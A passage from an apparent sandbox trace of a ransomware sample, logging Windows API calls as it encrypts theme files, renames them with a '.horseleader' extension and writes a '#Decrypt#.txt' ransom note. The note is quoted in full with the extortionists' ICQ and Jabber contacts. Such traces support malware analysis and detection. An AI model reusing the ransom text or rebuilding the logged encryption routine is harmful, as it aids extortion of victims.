lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.449] CloseHandle (hObject=0x1a4) returned 1 [0246.449] GetProcessHeap () returned 0x780000 [0246.449] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.449] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.horseleader") returned 92 [0246.449] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png.horseleader")) returned 1 [0246.450] GetProcessHeap () returned 0x780000 [0246.450] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.450] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4f93, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.450] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.450] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\#Decrypt#.txt") returned 81 [0246.450] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.451] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0246.451] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.452] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.452] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.453] CloseHandle (hObject=0x158) returned 1 [0246.453] GetProcessHeap () returned 0x780000 [0246.453] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.453] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="COMPASS", cAlternateFileName="")) returned 1 [0246.453] lstrcmpiW (lpString1="COMPASS", lpString2="Windows") returned -1 [0246.453] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS") returned 67 [0246.453] lstrcmpW (lpString1="COMPASS", lpString2=".") returned 1 [0246.453] lstrcmpW (lpString1="COMPASS", lpString2="..") returned 1 [0246.453] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.453] GetProcessHeap () returned 0x780000 [0246.453] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.453] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\*") returned 69 [0246.453] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.455] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.455] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\.") returned 69 [0246.455] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.455] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.455] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.455] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\..") returned 70 [0246.455] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.455] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.455] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf17d4300, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x6041aaf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf17d4300, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xd613, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="COMPASS.ELM", cAlternateFileName="")) returned 1 [0246.455] lstrcmpiW (lpString1="COMPASS.ELM", lpString2="Windows") returned -1 [0246.455] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM") returned 79 [0246.455] StrStrIW (lpFirst="COMPASS.ELM", lpSrch=".horseleader") returned 0x0 [0246.455] lstrcmpW (lpString1="COMPASS.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.455] lstrcmpW (lpString1="COMPASS.ELM", lpString2="_uninstalling_.png") returned 1 [0246.455] lstrlenW (lpString=".testttjffg") returned 11 [0246.455] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM", lpSrch=".testttjffg") returned 0x0 [0246.455] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.455] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.456] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.457] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM") returned 79 [0246.457] StrStrW (lpFirst="COMPASS.ELM", lpSrch=".txt") returned 0x0 [0246.457] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=54803) returned 1 [0246.457] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.462] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.462] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.462] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.462] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.463] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.463] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3613, lpOverlapped=0x0) returned 1 [0246.463] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffc9ed, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.463] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3613, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3613, lpOverlapped=0x0) returned 1 [0246.463] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.463] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.464] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.464] CloseHandle (hObject=0x1a4) returned 1 [0246.464] GetProcessHeap () returned 0x780000 [0246.464] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.464] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM.horseleader") returned 91 [0246.464] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.elm.horseleader")) returned 1 [0246.465] GetProcessHeap () returned 0x780000 [0246.465] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.465] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x51cc30d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="COMPASS.INF", cAlternateFileName="")) returned 1 [0246.465] lstrcmpiW (lpString1="COMPASS.INF", lpString2="Windows") returned -1 [0246.465] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF") returned 79 [0246.465] StrStrIW (lpFirst="COMPASS.INF", lpSrch=".horseleader") returned 0x0 [0246.465] lstrcmpW (lpString1="COMPASS.INF", lpString2="#Decrypt#.txt") returned 1 [0246.465] lstrcmpW (lpString1="COMPASS.INF", lpString2="_uninstalling_.png") returned 1 [0246.465] lstrlenW (lpString=".testttjffg") returned 11 [0246.465] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF", lpSrch=".testttjffg") returned 0x0 [0246.465] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.466] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.466] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.466] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF") returned 79 [0246.466] StrStrW (lpFirst="COMPASS.INF", lpSrch=".txt") returned 0x0 [0246.466] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=486) returned 1 [0246.466] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1e6, lpOverlapped=0x0) returned 1 [0246.468] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.468] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1e6, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1e6, lpOverlapped=0x0) returned 1 [0246.468] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.468] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.468] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.468] CloseHandle (hObject=0x1a4) returned 1 [0246.468] GetProcessHeap () returned 0x780000 [0246.468] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.469] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF.horseleader") returned 91 [0246.469] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\COMPASS.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\compass.inf.horseleader")) returned 1 [0246.514] GetProcessHeap () returned 0x780000 [0246.514] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.514] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x50d, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.515] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.515] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 79 [0246.515] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.515] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.515] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.515] lstrlenW (lpString=".testttjffg") returned 11 [0246.515] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.515] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.515] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.516] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.516] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 79 [0246.516] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.516] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1293) returned 1 [0246.516] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x50d, lpOverlapped=0x0) returned 1 [0246.519] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffaf3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.519] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x50d, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x50d, lpOverlapped=0x0) returned 1 [0246.520] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.520] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.520] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.520] CloseHandle (hObject=0x1a4) returned 1 [0246.520] GetProcessHeap () returned 0x780000 [0246.520] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.520] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.horseleader") returned 91 [0246.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif.horseleader")) returned 1 [0246.521] GetProcessHeap () returned 0x780000 [0246.521] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.522] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x505f, 